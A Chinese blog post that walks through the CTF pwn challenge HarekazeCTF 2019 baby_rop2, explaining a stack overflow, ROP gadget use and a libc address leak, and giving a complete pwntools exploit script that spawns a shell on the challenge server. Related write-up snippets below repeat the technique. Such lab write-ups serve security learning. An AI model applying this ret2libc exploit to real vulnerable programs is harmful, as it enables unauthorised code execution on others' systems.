[PWN] 泄露libc HarekazeCTF_2019_baby_rop2

最新推荐文章于 2024-10-03 22:53:13 发布
最新推荐文章于 2024-10-03 22:53:13 发布
阅读量783 收藏 5
点赞数 3
CC 4.0 BY-SA版权
分类专栏: PWN 文章标签: linux python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_55700752/article/details/128083893
本文详细介绍了分析64位程序HarekazeCTF_2019_baby_rop2的过程,包括文件信息检查、IDA静态分析、栈溢出利用和ROP gadget的寻找。通过构造payload泄露libc地址,最终实现system函数调用获取shell。文章还展示了利用python脚本来交互并执行exploit。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

HarekazeCTF_2019_baby_rop2

1.查看文件信息

checksec一下:64位文件,开启了RELOR和NX保护

image-20221128152653545

运行:输入了一个字符串

image-20221128152821197

2.IDA分析

buf距离rbp只有0x20个字节,但是可以读入0x100个字节,存在栈溢出,

查找程序函数和字符串,不存在system和’/bin/sh’,因此需要泄露libc版本查找

image-20221128154830633

因为本程序时64位程序,传递参数时前6个参数用寄存器RDI、RSI、RDX、RCX、R8、R9,传递,其余参数才通过栈传递

因此利用ROPgadget指令寻找"pop rdi"“pop rsi”

image-20221128154817369

image-20221128155317929

不存在单独利用rsi的指令,没有关系,随意设置r15就可以

利用printf泄露函数地址,参数类型为printf(“%s”,address),

第一个参数我们利用程序自带的’Welcome …,%s’字符串

第二个参数我们选择打印read函数的真正地址来泄露libc

image-20221128155800132

payload = b’a’*(0x20 + 8) + p64(rdi_add) + p64(format_add) + p64(rsi_add) + p64(read_got) + p64(0) + p64(printf_plt) + p64(main_add)

解释第一个payload:

  • b’a’*(0x20 + 8) :填充buf和rbp
  • p64(rdi_add) + p64(format_add):该指令为 **pop rdi;ret **,执行后将p64(format_add)赋值给寄存器rdi,为printf的第一个参数
  • p64(rsi_add) + p64(read_got) + p64(0):同理,pop rsi; pop r15; ret 执行后将p64(read_got)赋值给寄存器rsi,printf的第二个参数,将p64(0)赋值给寄存器r15,无意义
  • p64(printf_plt):执行ret指令后,返回到printf在plt表中的地址,相当于执行printf函数
  • p64(main_add):printf函数的返回地址,得到read真正地址后返回程序开始,重新执行

3.构造exp

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p = remote("node4.buuoj.cn",27387)

elf = ELF("babyrop2")
main_add = elf.sym['main']
printf_plt = elf.plt['printf']
read_got = elf.got['read']

rdi_add = 0x400733
rsi_add = 0x400731
format_add = 0x400770

payload = b'a'*(0x20 + 8) + p64(rdi_add) + p64(format_add) + p64(rsi_add) + p64(read_got) + p64(0) + p64(printf_plt) + p64(main_add)
p.recvuntil("name? ")
p.sendline(payload)
read_add =  u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) # 还没理解
print (hex(read_add))

libc = LibcSearcher('read',read_add)
libc_base  = read_add - libc.dump('read')
sys_add = libc_base + libc.dump('system')
bin_add = libc_base + libc.dump('str_bin_sh')

payload_ = b'a'*(0x20 + 8) + p64(rdi_add) + p64(bin_add) + p64(sys_add)
p.recvuntil("name? ")
p.sendline(payload_)
p.interactive()

python3会出现选择libc版本的界面,选择相应的版本,第6个

image-20221128171608139

进入shell后直接 cat flag 无效 ,find -name ‘flag’ 寻找flag

路径为 /home/babyrop2/flag,直接 cat

image-20221128171705220
image-20221128171815763

buuctf pwn [HarekazeCTF2019]baby_rop2
weixin_45441024的博客
12-03 531
buuctf pwn [HarekazeCTF2019]baby_rop2 ret2libc 老样子还是先check一下,发现开启了NX,说明我们不能利用ret2shellcode了,将文件放到IDA里面来分析一下 题目中有%s字符的字样,我们就想到了利用格式化字符串来泄露某个函数的真实地址,来找到libc的版本,最后拼接出一个system("/bin/sh")来获取shell,通过上图我们找到了溢出点在read函数,buf距离栈底的高度为0x20 因为这是一个64位的程序,其参数是通过寄存器来传递的,
BUUCTF [HarekazeCTF2019]baby_rop2
最新发布
2401_88087539的博客
02-02 473
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
pwn】orw&rop --泄露libc基址,orw
question55的博客
12-04 471
我们先看看程序的保护的情况因为题目提示了orw,我们可以沙箱检测一下可以发现是禁用的execve函数的,接着看函数逻辑这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:from pwn import *context(os='linux',arch='amd64',log_level='debug
泄露libc
inquisiter
01-12 1643
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如"%n"和"%12$p"这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
buuctf [HarekazeCTF2019]baby_rop2
carol2358的博客
04-21 494
一道常规的泄漏libc然后rop的题目 exp: from pwn import * from LibcSearcher import * local_file = './babyrop2' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 if select == 0: r = proce...
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1785
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
网络攻防初学者记录10.03-补充
2301_78571744的博客
10-03 1403
发现他要你去看http response,那么打开burpsite(我下载的是免费版,然后麻烦的是每次网页抓包时都需要设置一下系统的代理127.0.01:8080,burpsite中的代理是默认不用管。等burpsite打开后,进入页面再选择intercept on,就绪后,点击sign up,burpsite就会弹出下面图示,记住一定要观察是否是post,我们要从post方式修改内容。最后一个c["n"],它比较特别,他是由两个元素组成,c["n"]是数组,c["n"][0]也是数组。
[HarekazeCTF2019]baby_rop2
m0_52231248的博客
11-16 962
[HarekazeCTF2019]baby_rop2 Checksec: Ida: 很容易看到read存在溢出,offest=0x28 程序中没有system函数和sh字段我们要用ret2libc绕过nx保护 程序中存在printf函数我们用它来泄漏libc基址 先找到printf需要填的rdi和rsi Exp: from pwn import * from LibcSearcher import * context.log_level='debug' r=remote("n
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 329
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2
空城惜梦的博客
06-09 579
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2解题分析漏洞利用payload解析payload 解题分析 按照惯例先checksec,发现开了nx和RELRO,又因为题目给了文件libc.so.6,所以猜测要需要构造ROP来布置程序执行路线图 运行程序来观察程序的逻辑,发现需要输入name,然后程序再把输入的name打印出来 64位IDA打开,发现buf缓冲区只有0x20个字节大小,但read却可以往buf缓冲区中写入0x100个字节,所以这里存在着栈溢出 shift+
[HarekazeCTF2019]baby_rop2【BUUCTF】
qq_41696518的博客
09-02 454
明显存在栈溢出,那么就是找system和/bin/sh的问题了,该题给了libc,那就是泄露出真实的libc载入基址本题即可求解。由于本题是64位的,因此参数要写入寄存器中,顺序为rdi,rsi,rdx,rcx,r8,r9。
泄漏libc基地址
yjh_fnu_ltn的博客
06-01 1751
这里可以利用vulnerable_function函数进行栈溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面。利用write函数的got表和plt表,溢出得到write函数的地址,在计算得到libc_base基地址。先看汇编下调用write函数时参数的传递:(以32位为例),泄漏 fun_name的got地址和。
HarekazeCTF2019 baby_rop2
pondzhang的专栏
05-07 297
from pwn import * p = process('./babyrop2') libcelf = ELF('./libc-2.23.so') p = process('./babyrop2') p.recvuntil("What's your name? ") pltprintf = 0x00000000004004F0 gotread = 0x0000000000601020 popr...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值